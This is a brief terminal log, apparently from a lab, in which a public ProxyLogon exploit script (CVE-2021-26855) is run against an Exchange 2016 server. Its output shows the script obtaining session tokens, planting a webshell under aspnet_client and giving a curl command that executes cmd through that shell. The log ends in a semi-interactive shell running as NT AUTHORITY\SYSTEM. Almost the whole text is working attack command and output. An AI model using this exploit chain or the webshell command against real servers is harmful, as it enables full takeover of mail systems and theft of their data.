Exchange 2016 CU18
https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-26855
https://github.com/Udyz/Proxylogon
(base) ┌──(root㉿Kali)-[~/tools/Proxylogon]
└─# python3 proxylogon.py exchange3.sec.local administrator@sec.local
Attacking target exchange3.sec.local
=============================
Got DN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cb968bc6fc7449e09efe589fab569c4b-Admin
Got SID: S-1-5-21-2066713137-2133816201-3751750268-500
Got session id: 243818c6-8007-43ab-8aeb-e19ee666082f
Got canary: THCI8FEtb06Lr9PnnTi8wJ1VwxrPwd0IbPM2doPVCV7sXWls9S43AS-kST9PEMMO0v0TpxfN0gE.
Got viewstate: /wEPDwUILTg5MDAzMDFkZD5l9rtrkspFOuFDQjkwLQSADUXbfG1gZjWByCM+iJHV
=========== It means good to go!!!====
Got OAB id: 262216e7-40d8-4670-8068-c50057fa88d7
(+) Webshell drop at https://exchange3.sec.local/aspnet_client/shell.aspx .. Have fun!
(+) Code: curl -ik https://exchange3.sec.local/aspnet_client/shell.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())'
(+) Starting semi-interactive
CMD # whoami
nt authority\system
Server : EXCHANGE3
WhenChanged : 2025/7/10 22:34:56
InternalUrl : https://exchange3.sec.local/OAB
ExternalUrl : http://ffff/#
Identity : EXCHANGE3\OAB (Default Web Site)
PollInterval : 480
CMD #